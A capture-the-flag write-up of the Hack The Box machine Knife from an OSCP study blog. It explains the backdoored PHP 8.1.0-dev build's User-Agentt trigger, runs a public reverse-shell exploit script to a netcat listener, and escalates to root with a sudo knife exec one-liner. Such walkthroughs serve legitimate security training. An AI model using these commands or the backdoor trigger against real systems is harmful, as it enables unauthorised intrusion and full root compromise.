Path to OSCP: Knife
As part of my progress towards achieving Offensive Security Certified Professional certification, I’m attempting to complete all NetSecFocus OSCP-style boxes on Hack The Box, and detailing each box in this “Path to OSCP” blog series.
Next up is Knife. We fire up nmap:
u01@nostromo:~$ nmap -p- -A knife.htb -oA HTB/knife/knife
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-15 14:04 IST
Nmap scan report for knife.htb (10.10.10.242)
Host is up (0.044s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Emergent Medical Idea
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.17 seconds
The webpage shows the home of a healthcare company:
All “links” are just plain text, and there is nothing of interest in the page source. We try ffuf and gobuster for directory enumeration with a range of wordlists and settings, but can’t find anything of interest.
I kick off a basic Nikto scan to see if it can highlight anything of interest:
u01@nostromo:~$ nikto -host knife.htb
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.10.10.242
+ Target Hostname:    knife.htb
+ Target Port:        80
+ Start Time:         2023-09-15 16:24:20 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: Retrieved x-powered-by header: PHP/8.1.0-dev.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ 7962 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2023-09-15 16:29:56 (GMT1) (336 seconds)
---------------------------------------------------------------------------
Nikto reports an X-Powered-By header of PHP/8.1.0-dev. A quick Google of this version brings me to php-8.1.0-dev-backdoor-rce | PHP 8.1.0-dev Backdoor System Shell Script (flast101.github.io), which details a backdoor for this particular PHP version: “If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agent header”. This is the build produced after the March 2021 compromise of the php-src git repository, where two malicious commits added code that reads the non-standard User-Agentt header (note the doubled t) and, when its value begins with the string zerodium, evaluates the rest of the value as PHP. A normal User-Agent header does nothing, so the backdoor is invisible to ordinary browsing and scanning. I clone the repo, and using the reverse shell variant of the exploit we get a reverse shell to a listening netcat as user james and retrieve the user.txt flag:
u01@nostromo:/repo/php-8.1.0-dev-backdoor-rce$ python revshell_php_8.1.0-dev.py http://knife.htb 10.10.14.2 7777
u01@nostromo:~$ nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.242] 34682
bash: cannot set terminal process group (1033): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:~$ ls -l ~/user.txt
ls -l ~/user.txt
-r-------- 1 james james 33 Sep 15 12:58 /home/james/user.txt
Checking james’ sudo permissions, he can run /usr/bin/knife as root without providing a password:
james@knife:~$ sudo -l
sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
james@knife:~$
“Knife is a command-line tool that provides an interface between a local chef-repo and the Chef Infra Server”. We check old reliable GTFOBins for a privilege escalation path through sudo on knife, and sure enough there is a straightforward drop to a root shell: knife exec evaluates arbitrary Ruby, and its -E option takes that Ruby as a string on the command line, so a one-liner that calls Ruby's exec with /bin/sh replaces the root-owned knife process with a root shell. No password, no file write and no PATH tricks are needed; the sudo rule alone is the vulnerability.
We obtain root using this method and can retrieve the root.txt flag:
james@knife:/$ sudo knife exec -E 'exec "/bin/sh"'
sudo knife exec -E 'exec "/bin/sh"'
id
uid=0(root) gid=0(root) groups=0(root)
ls -l /root/root.txt
-r-------- 1 root root 33 Sep 15 12:58 /root/root.txt
Takeaway for OSCP
This was a very straightforward box, and there is not a huge amount to take away, other than the perspective an alternative information gathering tool can give you. Directory brute-forcing with ffuf and gobuster found nothing, while Nikto surfaced the one X-Powered-By header that gave away the backdoored PHP build. Reading the response headers directly, for example with curl -I, is a cheap habit that would have found the same thing.